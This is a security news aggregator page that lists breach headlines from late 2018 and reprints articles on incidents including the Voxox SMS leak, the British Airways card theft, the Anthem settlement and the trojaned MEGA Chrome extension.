- Incident -

Last update 09.10.2017 13:51:08

Home  Analysis  Android  Apple  APT  Attack  BigBrothers  BotNet  Congress  Crime  Crypto  Cryptocurrency  Cyber  CyberCrime  CyberSpy  CyberWar  Exploit  Forensics  Hacking  ICS  Incindent  iOS  IT  IoT  Mobil  OS  Phishing  Privacy  Ransomware  Safety  Security  Social  Spam  Vulnerebility  Virus  EN  List  Czech Press  Page

Introduction  List  Kategorie  Subcategory 0  1  2  3  4  5  6  7  8



17.12.18

Equifax: A study in accountability but not authority responsibility

Incindent

Net-security

13.12.18

ID Numbers for 120 Million Brazilians taxpayers exposed online

IncindentSecurityaffairs

13.12.18

U.S. House Report Blasts Equifax Over Poor Security Leading to Massive 2017 BreachIncindentSecurityweek

13.12.18

Personal Details of 120 Million Brazilians ExposedIncindentSecurityweek

13.12.18

Taxpayer ID Numbers for 120 Million Brazilians Exposed OnlineIncindent

Bleepingcomputer

11.12.18

Hackers Steal Over 40k Logins for Gov Services in 30 Countries

IncindentBleepingcomputer

11.12.18

Organizations Still Slow to Detect Breaches: CrowdStrikeIncindentSecurityweek

11.12.18

30% of healthcare databases are exposed online

Incindent

Net-security

7.12.18

New Lawsuit Claims Marriott Still Exposes Customer InformationIncindentSecurityweek
7.12.18Evidence in Marriott’s subsidiary Starwood hack points out to China intelIncindentSecurityaffairs
6.12.18Unprotected MongoDB Exposes Scraped Profile Data of 66 MillionIncindentBleepingcomputer
6.12.18DarkVishnya: Banks attacked through direct connection to local networkIncindentKaspersky

5.12.18

Quora Breach Exposes a Wealth of Info on 100M Users

Incindent

Threatpost

5.12.18

1-800-Flowers Becomes Latest Payment Breach Victim

Incindent

Threatpost

5.12.18

Magecart Group Ups Ante: Now Goes After Admin Credentials

Incindent

Threatpost

4.12.18

Quora Hacked - 100 Million User's Data ExposedIncindentBleepingcomputer

4.12.18

KoffeyMaker: notebook vs. ATMIncindentKaspersky

4.12.18

Quora data breach: hackers obtained information on roughly 100 million usersIncindentSecurityaffairs

4.12.18

Quora Data Breach Hits 100 Million UsersIncindentSecurityweek

4.12.18

Schumer Says Marriott Should Pay to Replace Hacked PassportsIncindentSecurityweek

4.12.18

Quora Gets Hacked – 100 Million Users Data StolenIncindentThehackernews
4.12.18

Chris Vickery on the Marriott Breach and a Rash of Recent High-Profile Hacks

Incindent

Threatpost

3.12.18Experts found data belonging to 82 Million US Users exposed on unprotected Elasticsearch Instances

Incindent

Securityaffairs
3.12.18Espionage, ID Theft? Myriad Risks From Stolen Marriott DataIncindentSecurityweek
3.12.18Lawsuits Filed Against Marriott Over Massive Data BreachIncindentSecurityweek
2.12.18Marriott Starwood data breach: 5 defensive steps travelers should take nowIncident blogEset
1.12.18327 million Marriott guests affected in Starwood Data Breach

Incindent

Securityaffairs
30.11.18Marriott Hit by Massive Data Breach: 500 Million Starwood Customers Impacted

Incindent

Securityweek
30.11.18Marriott Data Breach Affects 500 Million Starwood Guests

Incindent

Bleepingcomputer
30.11.182014 Marriott Data Breach Exposed, 500M Guests Impacted

Incindent

Threatpost
30.11.18SKY Brasil Exposes 32 Million Customer RecordsIncindentBleepingcomputer
30.11.18Records of 114 Million US Citizen and Companies Exposed OnlineIncindentBleepingcomputer
30.11.18Dell Systems Hacked to Steal Customer InformationIncindentBleepingcomputer

29.11.18

Dell Resets User Passwords Following Data Breach

Incindent

Securityweek

29.11.18

Records of 114 Million US Citizen and Companies Exposed Online

Incindent

Bleepingcomputer
29.11.18Dell Systems Hacked to Steal Customer Information

Incindent

Bleepingcomputer

29.11.18

AccuDoc Data Breach impacted 2.6 Million Atrium Health patients

IncindentSecurityaffairs

29.11.18

Dell Resets All Customers' Passwords After Potential Security Breach

Incindent

Thehackernews

29.11.18

Dell Warns of Attempted Breach on Network

Incindent

Threatpost

28.11.18

The One Planet York Data Breach That Was a Data Leak

Incindent

Bleepingcomputer

28.11.18

Industry Reactions to USPS Exposing User Data

Incindent

Securityweek

28.11.18

Data Breach Hits 2.6 Million Atrium Health PatientsIncindent

Securityweek

28.11.18

Industry Reactions to USPS Exposing User DataIncindent

Securityweek

28.11.18Uber fined nearly $1.2 Million by Dutch and UK Data Protection Authorities over data breach

Incindent

Securityaffairs

27.11.18

Uber Fined Nearly $1.2 Million by Dutch, UK Over Data Breach

Incindent

Securityweek

27.11.18

Uber fined $1.1 million by UK and Dutch regulators over 2016 data breachIncindentThehackernews

27.11.18

Uber Fined for Covering Up 2016 Data BreachIncindentBleepingcomputer

27.11.18

When Do You Need to Report a Data Breach?

Incindent

Securityaffairs

27.11.18

USPS, Amazon Data Leaks Showcase API Weaknesses

Incindent

Threatpost

27.11.18

Knuddels Flirt App Slapped with Hefty Fine After Data Breach

Incindent

Threatpost

26.11.18

HR Software Firm PageUp Finds No Evidence of Data Theft

Incindent

Securityweek
24.11.18Software company OSIsoft has suffered a data breachIncindentPBWCZ.CZ

23.11.18

US Postal Service Exposes Data of 60 Million Users for Over a Year

Incindent

Bleepingcomputer

23.11.18

Software company OSIsoft has suffered a data breach

IncindentSecurityaffairs
22.11.18A flaw in US Postal Service website exposed data on 60 Million UsersIncindentPBWCZ.CZ

22.11.18

US Postal Service Left 60 Million Users Data Exposed For Over a Year

Incindent

Thehackernews

22.11.18

Amazon Data Leak Exposes Email Addresses Right Before Black Friday

Incindent

Bleepingcomputer

21.11.18

MageCart Group Sabotages Rival to Ruin Data and Reputation

Incindent

Bleepingcomputer

20.11.18

VisionDirect Data Breach Caused by MageCart Attack

Incindent

Bleepingcomputer

19.11.18

VisionDirect Blindsided by Magecart in Data Breach

Incindent

Threatpost

19.11.18

Ford Eyes Use of Customers’ Personal Data to Boost Profits

Incindent

Threatpost

16.11.18

Infowars Store Affected by Magecart Credit Card Stealing Hack

IncindentBleepingcomputer
15.11.18Cathay Apologizes Over Data Breach but Denies Cover-upIncindentPBWCZ.CZ
14.11.18Cathay Says 'Most Intense' Period of Data Breach Lasted MonthsIncindentPBWCZ.CZ
13.11.18Cathay Pacific waited six months before disclosing the security breachIncindentPBWCZ.CZ
7.11.18HSBC Bank USA Warns Customers of Data BreachIncindentPBWCZ.CZ
3.11.18Radisson Hotel Group Hit by Data BreachIncindentPBWCZ.CZ
1.11.18The Radisson Hotel Group has suffered a data breachIncindentPBWCZ.CZ
31.10.18Girl Scouts data breach exposed personal information of 2,800 membersIncindentPBWCZ.CZ
27.10.18British Airways: additional 185,000 passengers may have been affectedIncindentPBWCZ.CZ
27.10.18Questions Mount Over Delay After Cathay Pacific Admits Huge Data LeakIncindentPBWCZ.CZ
25.10.18Cathay Pacific Hit by Data Leak Affecting 9.4M PassengersIncindentPBWCZ.CZ
25.10.18Magecart Hackers Now Targeting Vulnerable Magento ExtensionsIncindentPBWCZ.CZ
25.10.18Cathay Pacific data breach affecting 9.4 million passengersIncindentPBWCZ.CZ
25.10.18Yahoo to Pay $50M, Other Costs for Massive Security BreachIncindentPBWCZ.CZ
22.10.18Hackers breached into system that interacts with HealthCare.govIncindentPBWCZ.CZ
13.10.18Fitmetrix fitness software company may have exposed millions of customer recordsIncindentPBWCZ.CZ
10.10.18Project Strobe, what will change after the Google security breach?IncindentPBWCZ.CZ
10.10.18Google Tightens Rules Around App PermissionsIncindentPBWCZ.CZ
9.10.18California to Ban Weak PasswordsIncindentPBWCZ.CZ
7.10.18Sales intel firm Apollo data breach exposed more than 200 million contact recordsIncindentPBWCZ.CZ
27.9.18Firefox Notifies Users of Compromised AccountsIncindentPBWCZ.CZ
27.9.18Uber agrees to pay $148 million in massive 2016 data breach settlementIncindentPBWCZ.CZ
25.9.18Over 6 Million Users Hit by Breach at Fashion Retailer SHEINIncindentPBWCZ.CZ
25.9.18SHEIN Data breach affected 6.42 million usersIncindentPBWCZ.CZ
22.9.18Card Data-Scraping Magecart Code Found on NeweggIncindentPBWCZ.CZ
20.9.18Click2Gov Attacks on U.S. Cities Attributed to Previously Unknown GroupIncindentPBWCZ.CZ
20.9.18Access to over 3,000 compromised sites sold on Russian black marketplace MagBoIncindentPBWCZ.CZ
18.9.18Amazon Probing Staff Data LeaksIncindentPBWCZ.CZ
14.9.18Operator at kayo.moe found a 42M Record Credential Stuffing Data ready to useIncindentPBWCZ.CZ
12.9.18British Airways, Another Victim of Ongoing Magecart AttacksIncindentPBWCZ.CZ
10.9.18GAO Report shed the lights on the failures behind the Equifax hackIncindentPBWCZ.CZ

Million password resets and 2FA codes exposed in unsecured Vovox DB
19.11.18 securityaffairs  Hacking 
Incindent

Million of password resets and two-factor authentication codes exposed in unsecured Vovox DB.
Sébastien Kaul, a security researcher based in Berlin, has discovered a poorly secured database owned by communication firm Vovox that contained left names, phone numbers, tens of millions of SMS messages, temporary passwords, two-factor codes, shipping alerts, and other information belonging to customers of companies including Microsoft, Amazon, and Google.

It has been estimated that the exposed archive included at least 26 million text messages year-to-date.

“Although Kaul found the exposed server on Shodan, a search engine for publicly available devices and databases, it was also attached to one of Voxox’s own subdomains.” reported Techcrunch.

“Worse, the database — running on Amazon’s Elasticsearch — was configured with a Kibana front-end, making the data within easily readable, browsable and searchable for names, cell numbers and the contents of the text messages themselves.”

Vovox data leak

Vovox promptly took down the database after TechCrunch informed the company with an inquiry.

Anyone that accessed to the database while it was exposed online could have obtained two-factor codes sent by users to access their accounts potentially exposing them to account take over.

Below TechCrunch’s findings from a cursory review of the data:

We found a password sent in plaintext to a Los Angeles phone number by dating app Badoo;
Several Booking.com partners were sent their six-digit two-factor codes to log in to the company’s extranet corporate network;
Fidelity Investments also sent six-digit security codes to one Chicago Loop area code;
Many messages included two-factor verification codes for Google accounts in Latin America;
A Mountain View, Calif.-based credit union, the First Tech Federal Credit Union, also sent a temporary banking password in plaintext to a Nebraska number;
We found a shipping notification text sent by Amazon with a link, which opened up Amazon’s delivery tracking page, including the UPS tracking number, en route to its destination in Florida;
Messenger apps KakaoTalk and Viber, and quiz app HQ Trivia use the service to verify user phone numbers;
We also found messages that contained Microsoft’s account password reset codes and Huawei ID verification codes;
Yahoo also used the service to send some account keys by text message;
And, several small to mid-size hospitals and medical facilities sent reminders to patients about their upcoming appointments, and in some cases, billing inquiries.
Kevin Hertz, Voxox’s co-founder and chief technology officer, wrote in an email that the company is “looking into the issue and following standard data breach policy at the moment,” and that the company is “evaluating impact.”


689,272 plaintext records of Amex India customers exposed online
9.11.18 securityaffairs Hacking 
Incindent

Records associated with 689,272 plaintext records Amex India customers were exposed online via unsecured MongoDB server.
Personal details of nearly 700,000 American Express (Amex India) India customers were exposed online via an unsecured MongoDB server.

The huge trove of data was discovered by Bob Diachenko from cybersecurity firm Hacken, most of the records were encrypted, but 689,272 records were stored in plaintext.

The expert located the database by using IoT search engines such as Shodan and BinaryEdge.io.

“On 23rd October I discovered an unprotected Mongo DB which allowed millions of records to be viewed, edited and accessed by anybody who might have discovered this vulnerability. The records appeared to be from an American Express branch in India.” states the blog post published by Diachenko.

AMEX records american express

689,272 plaintext records included personal details of Amex India customers’ phone numbers, names, email addresses, and ‘type of card’ description fields.

The archive included 2,332,115 records containing encrypted data (i.e. names, addresses, Aadhaar numbers, PAN card numbers, and phone numbers.

Bob Diachenko
@MayhemDayOne
Seems like @AmexIndia exposed its #MongoDB for a while, with some really sensitive data (base64 encrypted). Now secured (just when I was preparing responsible disclosure), but question remains how long it was open. Found with @binaryedgeio engine.

42
10:12 AM - Oct 25, 18
35 people are talking about this
Twitter Ads info and privacy
“Upon closer examination, I am inclined to believe that the database was not managed by AmEx itself but instead by one their subcontractors who were responsible for SEO or lead generation. I came to this conclusion since many of the entries contained fields such as ‘campaignID’, ‘prequalstatus’ and ‘leadID’ etc.” added Diachenko.

Diachenko promptly reported his findings to Amex India that immediately took down the server. At the time of writing is not clear how much time the server remained exposed online, Amex India that investigated the case declared that it did not discover any “evidence of unauthorized access.”

“We applaud AmEx’s rapid response to this issue, noting they immediately took down that server upon notification and began further investigations.” Diachenko concluded.

“As we learned from this incident, one never knows when transient firewall rules may inadvertently expose your development machines to the public. In this case, it appears to have only exposed some long-lost personal information of an unknown number of AmEx India customers, but for others, it could be critical intellectual property or even your entire subscriber base that is at risk of being exposed.”


Top Australia Defence Firm Reports Serious Cyber Breach
2.11.18 securityweek
Incindent

A top Australian defence firm with major US Navy contracts has admitted its personnel files were breached and that it was the subject of an extortion attempt.

Austral -- which among other things makes small, quick ships for warfare close to shore -- said its "data management system" had been infiltrated by an "unknown offender".

In a statement, the company claimed that there was "no evidence to date" that "information affecting national security nor the commercial operations of the company have been stolen".

However it said staff email addresses and mobile phone numbers were accessed and the offender purported to offer materials for sale on the internet and "engage in extortion".

"The company has not and will not respond to extortion attempts."

Australia's department of defence said it "can confirm that no compromise of classified or sensitive information or technology has been identified so far."

The company was at pains to point out that the breach hit only its Australian business and did not extend to US projects, because the two computer systems are not linked.

Austral has won a controversial contract to build littoral combat ships for the US Navy.

The military says it does not need all the vessels paid for, but the project has been aggressively championed by powerful members of the US Congress from Alabama, were Austral's US shipyard is located.


The Belgacom hack was the work of the UK GCHQ intelligence agency
29.10.2019 securityaffairs
BigBrothers  Incindent

Belgian newspaper reported that investigators had found proof that the Belgacom hack was the work of the UK GCHQ intelligence agency.
Back to September 2013, Belgacom (now Proximus), the largest telecommunications company in Belgium and primarily state-owned, announced its IT infrastructure had suffered a malware-based attack.

Here we are again to speak about this incident after the Belgian newspaper De Standaard provided more details from a Belgian judicial investigation that was investigating the alleged involvement of British GCHQ.

Many experts linked the Regin malware to the Five Eyes alliance, they found alleged references to the super spyware in a number of presentations leaked by Edward Snowden and according to malware researchers, it has been used in targeted attacks against government agencies in the EU and the Belgian telecoms company Belgacom.

According to Snowden, the UK’s signals intelligence have hacked into the Belgian telco to spy on private communications in transit into its infrastructure.

This week the Belgian newspaper De Standaard reported that investigators had found proof that the hack “was the work of the GCHQ, an intelligence service of ally Great Britain”.

“This can all be read in a confidential report from the federal prosecutor’s office that the National Security Council discussed at the beginning of this week,” reported De Standaard.

The newspaper also states that federal prosecutors found evidence for the involvement of the UK intelligence in the hack that is not related to Snowden revelations.

“Specifically, these are IP addresses of computers where the spyware software communicated from Belgacom. Three of those addresses were owned by a British company, indicating that the spy software manager is in Great Britain,” continues the newspaper.

belgacom hack

The newspaper added that British Home Office refused to co-operate with the investigation.

If confirmed the situation is disconcerting, the UK was spying, along with other members of the FiveEyes, on a telco company belonging to a member of the NATO alliance.

The investigation revealed that the malware-based attack was powered by GCHQ and code-named Operation Socialist.

The attack between 2000 and early 2010, the hackers targeted company admins with spear-phishing attacks aimed at infecting their machines.

Attackers infected at least three Belgian techies’ machines and used them as entry points into the Belgacom’s networks, then they infected more than 5,000 machines.

“A GCHQ document reviewing operations conducted between January and March 2011 noted that the hack on Belgacom was successful, and stated that the agency had obtained access to the company’s systems as planned. By installing the malware on the engineers’ computers, the spies had gained control of their machines, and were able to exploit the broad access the engineers had into the networks for surveillance purposes.” wrote The Intercept.

“The document stated that the hacking attack against Belgacom had penetrated “both deep into the network and at the edge of the network,” adding that ongoing work would help “further this new access.”

GCHQ targeted the Belgacom International Carrier Services mainly because it handled a large amount of Middle Eastern roaming traffic.


BA Says 185,000 More Customers Affected in Cyber Attack
27.10.2019 securityweek
Attack  Incindent

British Airways owner IAG on Thursday said that a further 185,000 customers may have had their personal details stolen in a cyber attack earlier this year.

This includes the holders of 77,000 payment cards whose name, billing address, email address, card payment information have potentially been compromised.

A further 108,000 people's personal details without card verification value have also been compromised, the airline said in a statement.

"While British Airways does not have conclusive evidence that the data was removed from its systems, it is taking a prudent approach in notifying potentially affected customers, advising them to contact their bank or card provider as a precaution," it said.

The company, which has promised to compensate any affected customers, said there had been no verified cases of fraud since its first announcement about the cyber attack in September.

BA at the time took out full-page adverts in the UK newspapers to apologise to customers and called the theft "a very sophisticated, malicious, criminal attack on our website".

The company could be expected to comment further on the attack when IAG publishes its third quarter results on Friday.

The attack came after previous IT woes, including a worldwide system outage last year that affected thousands of customers.


Insurer Anthem Will Pay Record $16M for Massive Data Breach
18.10.18 securityweek
Incindent

The nation's second-largest health insurer has agreed to pay the government a record $16 million to settle potential privacy violations in the biggest known health care hack in U.S. history, officials said Monday.

The personal information of nearly 79 million people — including names, birthdates, Social Security numbers and medical IDs — was exposed in the cyberattack, discovered by the company in 2015.

The settlement between Anthem Inc. and the Department of Health and Human Services represents the largest amount collected by the agency in a health care data breach, officials said.

"When you have large breaches it erodes people's confidence in the privacy of their sensitive information, and we believe such a large breach of trust merits a substantial payment," said Roger Severino, director of the HHS Office for Civil Rights. The office also enforces the federal health care privacy law known as HIPAA, or the Health Insurance Portability and Accountability Act.

Severino said the Anthem settlement is nearly three times larger than the previous record amount paid to the government in a privacy case. That sends a message to the industry that "hackers are out there always and large health care entities in particular are targets," he added.

The Blue Cross-Blue Shield insurer also agreed to a corrective action plan under government monitoring, which involves a process for the company to assess its electronic security risks, take appropriate countermeasures and maintain ongoing surveillance.

Indianapolis-based Anthem covers more than 40 million people and sells individual and employer coverage in key markets like New York and California. The payment is in lieu of civil penalties that HHS may have imposed. Anthem admitted no liability. The civil case involving privacy laws is separate from any other investigation the government may be pursuing.

In a statement Monday, Anthem said it's not aware of any fraud or identity theft stemming from the breach. The company provided credit monitoring and identity theft insurance to all customers potentially affected.

"Anthem takes the security of its data and the personal information of consumers very seriously," the statement said. "We have cooperated with (the government) throughout their review and have now reached a mutually acceptable resolution."

The company discovered the data breach in early 2015, but hackers had been burrowing into its systems for weeks. Security experts said at the time that the size and scope of the attack indicated potential involvement by a foreign government.

Hackers used a common email technique called spear-phishing in which unwitting company insiders are tricked into revealing usernames and passwords. The Anthem attackers gained the credentials of system administrators, allowing them to probe deeply into the insurer's systems.

HHS said its investigation found that Anthem had failed to deploy adequate measures for countering hackers. The company lacked an enterprisewide risk analysis, had insufficient procedures to monitor activity on its systems, failed to identify and respond to suspected or known security incidents, and did not implement "adequate minimum access controls" to shut down intrusions from as early as February 2014.


Pentagon Defense Department travel records data breach
14.10.18 securityaffairs
Incindent

Pentagon – Defense Department travel records suffered a data breach that compromised the personal information and credit card data of U.S. military and civilian personnel.
The Pentagon revealed that the Defense Department travel records suffered a data breach that compromised the personal information and credit card data of U.S. military and civilian personnel.

The data breach could have happened some months ago and could have affected as many as 30,000 workers. The security breach was notified to the leaders on October 4.

“According to a U.S. official familiar with the matter, the breach could have affected as many as 30,000 workers, but that number may grow as the investigation continues. The breach could have happened some months ago but was only recently discovered.” reads the post published by the Associated Press.

“The official, who spoke on condition of anonymity because the breach is under investigation, said that no classified information was compromised.”

Pentagon

Lt. Col. Joseph Buccino, a Pentagon spokesman, declared the Defense is still investigating the incident, the security breach affected a still unidentified commercial vendor that provided service to Defense Department.

“It’s important to understand that this was a breach of a single commercial vendor that provided service to a very small percentage of the total population” of Defense Department personnel, said Buccino.

“The department is continuing to assess the risk of harm and will ensure notifications are made to affected personnel,” said the statement, adding that affected individuals will be informed in the coming days and fraud protection services will be provided to them.

The department is not identifying the vendor for security reason, it is still under contract, but the department “has taken steps to have the vendor cease performance under its contracts.”


Pentagon Reveals Cyber Breach of Travel Records
14.10.18 securityweek
BigBrothers  Incindent

The Pentagon on Friday said there has been a cyber breach of Defense Department travel records that compromised the personal information and credit card data of U.S. military and civilian personnel.

According to a U.S. official familiar with the matter, the breach could have affected as many as 30,000 workers, but that number may grow as the investigation continues. The breach could have happened some months ago but was only recently discovered.

The official, who spoke on condition of anonymity because the breach is under investigation, said that no classified information was compromised.

According to a Pentagon statement, a department cyber team informed leaders about the breach on Oct. 4.

Lt. Col. Joseph Buccino, a Pentagon spokesman, said the department is still gathering information on the size and scope of the hack and who did it.

Pentagon Breach"It's important to understand that this was a breach of a single commercial vendor that provided service to a very small percentage of the total population" of Defense Department personnel, said Buccino.

Pentagon Breach

The vendor was not identified and additional details about the breach were not available.

"The department is continuing to assess the risk of harm and will ensure notifications are made to affected personnel," said the statement, adding that affected individuals will be informed in the coming days and fraud protection services will be provided to them.

Buccino said that due to security reasons, the department is not identifying the vendor. He said the vendor is still under contract, but the department "has taken steps to have the vendor cease performance under its contracts."

Disclosure of the breach comes on the heels of a federal report released Tuesday that concluded that military weapons programs are vulnerable to cyberattacks and the Pentagon has been slow to protect the systems. And it mirrors a number of other breaches that have hit federal government agencies in recent years, exposing health data, personal information, and social security numbers.

The U.S. Government Accountability Office in its Tuesday report said the Pentagon has worked to ensure its networks are secure, but only recently began to focus more on its weapons systems security. The audit, conducted between September 2017 and October 18, found that there are "mounting challenges in protecting its weapons systems from increasingly sophisticated cyber threats."

In 2015, a massive hack of the federal Office of Personnel Management, widely blamed on China's government, compromised personal information of more than 21 million current, former and prospective federal employees, including those in the Pentagon. It also likely occurred months before it was discovered and made public, and it eventually led to the resignation of the OPM director.

Also that year, hackers breached into the email system used by the Joint Chiefs of Staff, affecting several thousand military and civilian workers.

The Defense Department has consistently said that its networks and systems are probed and attacked thousands of times a day.


BA Scrambles to Address Theft of Passenger Bank Details
8.9.18 securityweek Incindent

British Airways will financially compensate customers whose data were stolen in a "sophisticated" and "malicious" hack, chief executive Alex Cruz said Friday as he apologised for the fiasco.

BA late Thursday revealed that personal and financial details of customers who booked flights on the group's website and mobile phone app between August 21 and Wednesday had been stolen.

The revelation comes just a few months after the European Union tightened data protection laws.

"We're extremely sorry for what has happened," Cruz told the BBC on Friday.

"There was a very sophisticated, malicious, criminal attack on our website."

BA took out full-page adverts in the UK newspapers on Friday to apologise to customers, while the share price of parent group IAG was down more than three percent in London deals.

"We are 100 percent committed to compensate them," Cruz said.

"We will compensate them for any financial hardship that they may have suffered," he told the broadcaster.

BA said it had launched an urgent investigation after realising that about 380,000 bank cards used to book its flights had been hacked.

The stolen data comprised customer names, postal addresses, email addresses and credit card information.

However the 15-day breach did not involve travel or passport details and has been fixed, the airline added.

- Regulators investigate -

"The moment we found out (Wednesday) that actual customer data had been compromised, that's when we began an all out immediate communication to our customers. That was our priority," Cruz said.

However Enza Iannopollo, privacy and security analyst at advisory group Forrester, said BA could have done better on informing those affected.

"If the timeline is confirmed and BA became aware of the breach on the evening of September 5th, then they have done their breach notification on time, which is of course a good thing," she said in a statement.

"However, customers are obviously not impressed about BA breach management at present. Some discovered it on social media, others reported wasting hours on the phone with their bank, everyone expects more from a company that truly cares about its customers."

"Terrible handling of the situation," tweeted one affected customer, Mat Thomas.

Iannopollo told AFP that it was too early to know whether BA would be fined over the affair.

"Regulators will assess the circumstances of this breach consistently with GDPR requirements," she said referring to the EU's General Data Protection Regulation that came into force in May.

Britain's National Crime Agency said it was assessing the matter, while the UK's data protection watchdog, the Information Commissioner's Office, will make its own enquiries.

"The ICO will do its assessment and investigation to determine whether to levy a fine or impose any enforcement action, but this will take some time and it might be that the regulator determines that rules were not breached," Iannopollo said.

About 1100 GMT, shares in IAG, which runs also Spanish carriers Iberia and Vueling as well as Irish airline Aer Lingus, were down 3.5 percent at 657.60 pence on London's benchmark FTSE 100 index, down 0.8 percent overall.

"Today's news is a reminder of just what a hot issue cyber security remains and the importance of companies having the right protections in place to mitigate the risk posed by attacks," noted Russ Mould, investment director at AJ Bell.


British Airways hacked, attackers stole details of 380,000 customers
7.9.18 securityaffairs Incindent

Personal and payment card information of 380,000 British Airways customers were stolen by attackers, stolen data did not include travel or passport details.
British Airways was hacked, customer personal and payment card information of 380,000 were stolen by attackers, the stolen data did not include travel or passport details.

The company published a data breach notification on its website, the security breach affected customers making bookings on its website and app from 22:58 BST August 21 18 until 21:45 BST September 5 18 inclusive.

British Airways has launched an internal investigation and notified the police and relevant authorities.

“We are investigating, as a matter of urgency, the theft of customer data from our website and our mobile app. The stolen data did not include travel or passport details.” reads the data breach notification.

“From 22:58 BST August 21 18 until 21:45 BST September 5 18 inclusive, the personal and financial details of customers making bookings on our website and app were compromised.”

The airline confirmed that the breach has been resolved and its services are now working normally. British Airways is communicating with affected customers and is recommending customers who believe they may have been affected by the breach to contact their banks or credit card providers.

A spokesperson told the TechCrunch website that “around 380,000 card payments” were stolen.

“We are deeply sorry for the disruption that this criminal activity has caused. We take the protection of our customers’ data very seriously.” said Alex Cruz, British Airways’ chairman and chief executive.

Privacy advocated and security experts believe the company could face severe fines due to the new European GDPR data protection laws.

In March 2015, British Airways Executive Club member accounts were hacked, it wasn’t a data breach because hackers used credentials available in the underground.


British Airways Hacked With Details of 380,000 Cards Stolen
7.9.18 securityweek Incindent

British Airways said Thursday that the personal and financial details of customers making bookings between August 21 and September 5 were stolen in a data breach involving 380,000 bank cards.

"We are investigating, as a matter of urgency, the theft of customer data from our website and our mobile app. The stolen data did not include travel or passport details," the airline said in a statement.

"The personal and financial details of customers making bookings on our website and app were compromised," it said.

"The breach has been resolved and our website is working normally. We have notified the police and relevant authorities.

"We are deeply sorry for the disruption that this criminal activity has caused."

BA said the breach took place between 2158 GMT on August 21 and 2045 GMT on September 5.

Around 380,000 payment cards were compromised.

BA advised anyone who believed they may have been affected to contact their bank or credit card provider and follow their recommendations.

As for compensation, BA said: "We will be contacting customers and will manage any claims on an individual basis."

It said customers due to travel could check in online as normal as the incident had been resolved.

The National Crime Agency said: "We are aware of reports of a data breach affecting British Airways and are working with partners to assess the best course of action."

The NCA is set up to tackle the most serious and organised crime posing the highest risk to public security in Britain.

- Past IT issues -

BA apologised in July after technology issues caused dozens of its flights to and from London Heathrow Airport to be cancelled.

The airline said the problem was down to an incident with an IT system.

And in May 2017, British Airways suffered a major computer system failure triggered by a power supply issue near Heathrow which left 75,000 customers stranded.

IAG, which owns British Airways and Spanish carrier Iberia, said last month that first-half profits more than doubled.

Earnings after taxation flew to 1.4 billion euros ($1.6 billion) in the first six months of 18 compared with 607 million euros a year earlier, IAG said in a results statement.

The London-listed group, which is also the owner of Irish airline Aer Lingus and Spanish carrier Vueling, added that total revenues swelled three percent to 11.2 billion euros.

BA announced last month that it will halt flights to Tehran in September, citing low profitability as the US reimposes sanctions on Iran.


MEGA Chrome browser extension hacked, bogus version stole users’ credentials
6.9.18 securityaffairs Incindent

The MEGA Chrome browser extension had been hacked and replaced with a one that steals users’ credentials for popular web services
Are you using the MEGA Chrome browser extension? Uninstall it now because the Chrome extension for MEGA file storage service had been hacked and replaced with a one that steals users’ credentials for popular web services (i.e. Amazon, Microsoft, Github, and Google) and private keys for cryptocurrency wallets (i.e. MyEtherWallet and MyMonero, and Idex.market cryptocurrency trading platform.).

According to Mega, on 4 September at 14:30 UTC, an attacker hacked into the company Google Chrome web store account and uploaded a malicious version 3.39.4 of the extension.

“On 4 September 18 at 14:30 UTC, an unknown attacker uploaded a trojaned version of MEGA’s Chrome extension, version 3.39.4, to the Google Chrome webstore.” reads the security advisory published by Mega.

“Upon installation or autoupdate, it would ask for elevated permissions (Read and change all your data on the websites you visit) that MEGA’s real extension does not require and would (if permissions were granted) exfiltrate credentials for sites including amazon.com, live.com, github.com, google.com (for webstore login), myetherwallet.com, mymonero.com, idex.market and HTTP POST requests to other sites, to a server located in Ukraine. Note that mega.nz credentials were not being exfiltrated.”

Once installed, or after an auto-update, the malicious Mega Chrome extension asked for elevated permissions to steal the sensitive data and send it back a server controlled by the attackers that is located in Ukraine (megaopac[.]host).

After four hours the security breach, Mega updated a clean version (3.39.5) on the store, and affected installations were auto updated., Google removed the malicious extension from the Chrome webstore five hours after the breach.

“You are only affected if you had the MEGA Chrome extension installed at the time of the incident, autoupdate enabled, and you accepted the additional permission, or if you freshly installed version 3.39.4,” continues the advisory.

Mega highlighted that Google disallowed publishers to sign their Chrome extensions and opted to rely solely on signing them automatically once the extension is uploaded, opening the door to similar compromise.

The Italian security researcher who handles the Twitter account @serhack_ first reported the breach on both Reddit and Twitter.

SerHack
@serhack_
!!! WARNING !!!!!!! PLEASE PAY ATTENTION!!

LATEST VERSION OF MEGA CHROME EXTENSION WAS HACKED.

Version: 3.39.4

It catches your username and password from Amazon, GitHub, Google, Microsoft portals!! It could catch #mega #extension #hacked@x0rz

7:16 PM - Sep 4, 18
1,351
1,701 people are talking about this
Twitter Ads info and privacy
At the time it is not clear how many users have installed the malicious MEGA Chrome browser extension, experts speculate tens of millions of users. may have been affected.

The Firefox version of MEGA has not been compromised and Users accessing https://mega.nz without the Chrome extension have not been affected.

“You are only affected if you had the MEGA Chrome extension installed at the time of the incident, autoupdate enabled and you accepted the additional permission, or if you freshly installed version 3.39.4.” the company added.

“Please note that if you visited any site or made use of another extension that sends plain-text credentials through POST requests, either by direct form submission or through a background XMLHttpRequest process (MEGA is not one of them) while the trojaned extension was active, consider that your credentials were compromised on these sites and/or applications.”

Users who had installed the malicious MEGA Chrome browser extension must uninstall the version 3.39.4 and change passwords for all their accounts.

@SerHack published an interesting post on the hack, I suggest you read it.


International clothing chain C&A in Brazil suffered a data breach

6.9.18 securityaffairs Incindent
The clothing chain C&A in Brazil suffered a cyber attack on its gift card/exchange system last week, hackers leaked data on Pastebin.
The International fashion retail clothing chain C&A in Brazil suffered a data breach, the company confirmed hackers hit its gift card platform.

Hackers accessed to records belonging to customers who purchased gift cards, exposed data includes ID numbers, email addresses, the amount loaded into the cards, order number and data of purchase.

A member of the Fatal Error Crew hacker group that use the moniker @joshua has published on Pastebin the data from C&A customers who purchased gift cards online.

“Since you like to play with the data of others, we’ve decided to play around with your systems,” wrote hacker Joshua when he published the data.

“We would like to point out that we do not have the list of Gift Cards C & A or any other list of personal information of the customer, we mapped the same through the ID and only posted some internal information for staff C & A confirms the invasion We will not distribute any personal information on the internet since we do not endorse financial crimes Customer data is secure, the few published GiftCards were in the return section, so they would be discarded – Fatal Error Crew “reads a statement published by The Fatal Error Crew.

According to the Brazilian website Tecmundo, data of about 36,000 customers have been exposed in the attack.

